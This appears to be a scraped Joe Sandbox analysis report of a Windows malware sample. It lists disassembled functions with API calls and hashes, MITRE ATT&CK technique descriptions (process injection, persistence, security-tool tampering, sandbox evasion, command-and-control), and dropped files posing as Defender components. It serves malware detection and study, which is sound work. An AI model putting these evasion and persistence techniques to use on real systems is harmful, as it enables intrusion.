Associated: 00000007.00000002.2608804908.0000000000658000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2608864139.000000000065A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2608946360.000000000065B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2608946360.000000000065D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_BumpFiles.jbxd

Similarity

API ID: CreateDirectory
String ID:
API String ID: 4241100979-0
Opcode ID: 5111e6a9ea1a0a8007502bc41357b664fad3781dd6291e7cd61967ad68ac8ba3
Instruction ID: 46824d620446ac42301a83f1bbebc4f76fd1fdc196ae92059cb092e69fd8102b
Opcode Fuzzy Hash: 5111e6a9ea1a0a8007502bc41357b664fad3781dd6291e7cd61967ad68ac8ba3
Instruction Fuzzy Hash: 00B092A27513402AEA0039FA5CC2B2E008C9B5460EF10083AF111D6282E4AEC8950055

Uniqueness

Uniqueness Score: -1.00%

Function 00409D7C Relevance: 1.5, APIs: 1, Instructions: 10memoryCOMMON

Download Yara Rule

APIs

SysAllocStringLen.OLEAUT32(00000000,?), ref: 00409D83

Memory Dump Source

Source File: 00000007.00000002.2608186972.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2608096888.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2608614748.0000000000646000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2608647668.000000000064B000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2608676899.000000000064D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2608737186.0000000000654000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2608804908.0000000000658000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2608864139.000000000065A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2608946360.000000000065B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2608946360.000000000065D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_BumpFiles.jbxd

Similarity

API ID: AllocString
String ID:
API String ID: 2525500382-0
Opcode ID: dd0b7af6829fdb8ea53ff36f0f1c6947d542e7e52d8e55ddb7a24222a2ffb2fc
Instruction ID: eb0268cde3c4aeac134fbb2095324f8aaea440d50eeb766d39aaf95ab0d612a7
Opcode Fuzzy Hash: dd0b7af6829fdb8ea53ff36f0f1c6947d542e7e52d8e55ddb7a24222a2ffb2fc
Instruction Fuzzy Hash: F2B0122429870320FA1020325E01B37004C4F00341FC4017F6C2AF01C3EA3DCC019C7E

Uniqueness

Uniqueness Score: -1.00%

Function 0040F134 Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

GetSystemInfo.KERNEL32 ref: 0040F138

Memory Dump Source

Source File: 00000007.00000002.2608186972.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2608096888.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2608614748.0000000000646000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2608647668.000000000064B000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2608676899.000000000064D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2608737186.0000000000654000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2608804908.0000000000658000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2608864139.000000000065A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2608946360.000000000065B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2608946360.000000000065D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_BumpFiles.jbxd

Similarity

API ID: InfoSystem
String ID:
API String ID: 31276548-0
Opcode ID: 84ad2fbfb8aecb0fe2e08319b56d833cf1bf3e3b20a4b6675d57978a842bf5d4
Instruction ID: c9d0dbab03ec1449dfd6cadc3055f85912d320d9fe12348b59d5370955ded952
Opcode Fuzzy Hash: 84ad2fbfb8aecb0fe2e08319b56d833cf1bf3e3b20a4b6675d57978a842bf5d4
Instruction Fuzzy Hash: 3DA012244089001AC404A7197C4340F31805D41114FC40B68745CB52C2E619C5640BDB

Uniqueness

Uniqueness Score: -1.00%

Function 0040564C Relevance: 1.3, APIs: 1, Instructions: 41memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,0013FFF0,00001000,00000004,?,?,00405C63), ref: 00405663

Memory Dump Source

Source File: 00000007.00000002.2608186972.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2608096888.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2608614748.0000000000646000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2608647668.000000000064B000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2608676899.000000000064D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2608737186.0000000000654000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2608804908.0000000000658000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2608864139.000000000065A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2608946360.000000000065B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2608946360.000000000065D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_BumpFiles.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: d6471b694c53482f29af37f4d684f3e9f2dc181e884f57fe696aea683e58fed0
Instruction ID: 7b51e7b86078a4719c2a56ad589d93d8956ad9d8034c142f37d3783c14cff872
Opcode Fuzzy Hash: d6471b694c53482f29af37f4d684f3e9f2dc181e884f57fe696aea683e58fed0
Instruction Fuzzy Hash: EEF0AFF2B013018FE7549F789D417027BD6E705354F10817EE90DEBB98D7B088418B94

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse the Windows service control manager to execute malicious commands or payloads. The Windows service control manager ( `services.exe` ) is an interface to manage and manipulate services.The service control manager is accessible to users via GUI components as well as system utilities such as `sc.exe` and Net .
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Traffic Flow, Process: Process Creation, Service: Service Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions.Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Windows Registry.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Driver: Driver Load, File: File Metadata, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Creation, Service: Service Creation, Service: Service Modification, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in an attempt to elevate privileges. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Security constructs such as permission levels will often hinder access to information and use of certain techniques, so adversaries will likely need to perform privilege escalation to include use of software exploitation to circumvent those restrictions.
Tactics:	Privilege Escalation
Data Sources:	Driver: Driver Load, Process: Process Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata, File: File Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report 0219830219301290321012notas.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Initial Sample

Dropped Files

Unpacked PEs

Sigma Signatures

System Summary

Snort Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Program Files (x86)\Microsoft.NET\AMMonitoringProvider.dll

C:\Program Files (x86)\Microsoft.NET\AmMonitoringInstall.mof

C:\Program Files (x86)\Microsoft.NET\AmStatusInstall.mof

C:\Program Files (x86)\Microsoft.NET\ClientWMIInstall.mof

C:\Program Files (x86)\Microsoft.NET\ConfigSecurityPolicy.exe

C:\Program Files (x86)\Microsoft.NET\DefenderCSP.dll

C:\Program Files (x86)\Microsoft.NET\EppManifest.dll

C:\Program Files (x86)\Microsoft.NET\FepUnregister.mof

C:\Program Files (x86)\Microsoft.NET\MpAsDesc.dll

C:\Program Files (x86)\Microsoft.NET\MpAzSubmit.dll

C:\Program Files (x86)\Microsoft.NET\MpClient.dll

C:\Program Files (x86)\Microsoft.NET\MpCmdRun.dll

C:\Program Files (x86)\Microsoft.NET\MpCmdRun.exe

C:\Program Files (x86)\Microsoft.NET\MpCommu.dll

C:\Program Files (x86)\Microsoft.NET\MpCopyAccelerator.exe

Windows Analysis Report
0219830219301290321012notas.exe

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine or network device. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer or network device via Network Device CLI (e.g. `reload` ).
Tactics:	Impact
Data Sources:	Command: Command Execution, Process: Process Creation, Sensor Health: Host Status
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre